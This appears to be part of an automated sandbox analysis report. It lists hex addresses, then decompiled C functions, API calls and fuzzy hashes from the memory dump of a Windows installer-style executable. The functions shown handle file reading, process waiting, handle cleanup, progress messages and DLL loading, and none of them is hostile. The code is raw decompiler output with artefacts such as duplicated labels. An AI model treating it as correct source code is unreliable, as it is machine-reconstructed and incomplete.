0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x00407013
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00406f94
0x00406f91

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040329A(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x41f8fc -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x41f900 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						 *0x41f8f8 =  *0x41f908 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40c25b
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc;
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x004032aa
0x004032bd
0x004032c2
0x004033f2
0x004033f4
0x00000000
0x004033fa
0x004032ce
0x004032e1
0x004032e7
0x004032ed
0x004032f8
0x004032fd
0x00403302
0x0040330a
0x0040330c
0x0040330c
0x00403315
0x0040331c
0x00000000
0x00000000
0x00403322
0x00403328
0x0040332e
0x00000000
0x00403334
0x0040333a
0x0040335a
0x0040335f
0x00403364
0x0040336a
0x00403370
0x0040337a
0x00403381
0x00000000
0x00000000
0x00403383
0x00403389
0x0040338b
0x004033ae
0x004033b4
0x00000000
0x00000000
0x004033b6
0x004033b8
0x00000000
0x00000000
0x004033ba
0x004033ba
0x004033cd
0x00000000
0x00000000
0x004033dc
0x00000000
0x004033dc
0x00403395
0x0040339c
0x004033e9
0x004033ef
0x004033ef
0x00000000
0x004033ef
0x0040339e
0x004033a4
0x004033aa
0x00000000
0x00000000
0x00000000
0x004033ed
0x004033ed
0x00000000
0x004033ed
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004032AE

Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
SetFilePointer.KERNELBASE(?,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004066A6, Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066A6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E0040666D(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x004066b7
0x004066ce
0x004066c2
0x004066cc
0x004066cc
0x004066d9
0x004066e5

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 004066B7
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004066CC
GetExitCodeProcess.KERNELBASE ref: 004066D9

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: fed7b83ecc54252f8897308705ae45f822d023a23d6b40135bb103adba4fca30
Instruction ID: 20f91f9203a0284d0687456dabf59fbd28b0b8c4ed1a25645ee0343e140546d9
Opcode Fuzzy Hash: fed7b83ecc54252f8897308705ae45f822d023a23d6b40135bb103adba4fca30
Instruction Fuzzy Hash: ABE0D831610508FBDB009F55DD05E9E7B6EDB44710F110033F601B61A0D7B39E25DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403949, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, 0x42b800, 7);
			}

0x00403949
0x00403958
0x0040395b
0x0040395d
0x0040395d
0x00403964
0x0040396c
0x0040396f
0x00403971
0x00403971
0x00403971
0x00403978
0x0040398a

APIs

CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2962429428-3916508600
Opcode ID: 3c4dd07ac0d51147ed7a0aaad34b97e8bb6a5692673cd1a0e507344dbb086eee
Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
Opcode Fuzzy Hash: 3c4dd07ac0d51147ed7a0aaad34b97e8bb6a5692673cd1a0e507344dbb086eee
Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405E39( *0x40a01c, 0x4138f8, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403196
0x0040319f
0x004031a8
0x004031ac
0x004031b7
0x004031b7
0x004031bf
0x004031c6
0x004031d8
0x004031df
0x00403284
0x00403284
0x00000000
0x004031e5
0x004031e8
0x004031f4
0x004031f8
0x00403292
0x00403292
0x004031fe
0x00403201
0x00403260
0x00403266
0x00403268
0x00403268
0x0040327a
0x00403282
0x00403289
0x0040328c
0x00000000
0x00000000
0x00000000
0x00000000
0x00403203
0x00403206
0x00000000
0x0040320c
0x00403211
0x00403218
0x0040321b
0x0040321d
0x0040321d
0x0040322a
0x0040322d
0x00403234
0x00000000
0x00000000
0x0040323d
0x00403244
0x0040325c
0x00403286
0x00403286
0x00403246
0x00403246
0x00403249
0x0040324c
0x00403252
0x00403258
0x00000000
0x0040325a
0x00000000
0x0040325a
0x00403258
0x00000000
0x00403244
0x00000000
0x00403211
0x00403206
0x00403201
0x004031f8
0x004031df
0x00403294
0x00403297

APIs

SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406639
0x0040663c
0x00406643
0x0040664b
0x00406657
0x00000000
0x0040665e
0x0040664e
0x00406655
0x00000000
0x00406666
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
GetProcAddress.KERNEL32(00000000,?), ref: 0040665E

Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32 ref: 004065DA
Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
